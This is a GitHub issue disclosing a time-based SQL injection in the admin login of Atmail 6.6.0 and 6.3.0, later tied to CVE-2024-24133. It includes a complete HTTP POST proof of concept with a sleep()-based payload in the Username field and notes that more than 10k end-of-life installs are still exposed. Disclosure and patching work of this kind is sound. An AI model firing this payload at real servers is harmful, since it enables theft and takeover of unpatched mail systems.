search

Hebing123 / cve

0 stars 0 forks source link

SQL Injection Vulnerability in Atmail 6.6.0 #16

Open Hebing123 opened 10 months ago

Hebing123 commented 10 months ago

Summary

On January 12, we discovered that atmail 6.6.0 and atmail 6.3.0 weretested for SQL injection vulnerabilities that could be larger than 6.6.0.

The username parameter during admin login is at risk of SQL injection.

Details

We can prove this with delayed SQL injection, which we have testedon versions 6.6.0 and 6.3.0 and proved to have SQL injection vulnerabilities.

Proof of Concept (POC)

POST /index.php/admin/index/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://ip:port/
Content-Length: 153
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port
Connection: Keep-alive

Language=ca&Password=1&Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&login=1&send=1&server=https://ip:port/

As shown in the figure, a delay of 6 seconds proves that the injected SQL statement: sleep(6) has been executed. image

As shown in the figure, a delay of 10 seconds proves that the injected SQL statement: sleep(10) has been executed. image

Impact

  1. Leakage of user privacy informationstored in the database;
  2. Tamper with some web pages byoperating the database;
  3. modify the value of some fieldsin the database, embed the network horse link, and mount the horse attack;
  4. the database server was maliciouslyoperated, the system administrator account was tampered with;
  5. the database server providesoperating system support, so that hackers can modify or control the operating system.
Hebing123 commented 10 months ago

According to the manufacturer, the Atmail 6 was "retired" on June 30, 2014. As of this date, no further security improvements, bug fixes, or customer support are provided with this version of the product.

According to the statistics of the network mapping system, the network assets of the system are still more than 10k!

Therefore, I disclosed this report in the hope that users of the system will be able to fix it in time.

Hebing123 commented 9 months ago

This is the vulnerability exploitation reference for CVE-2024-24133.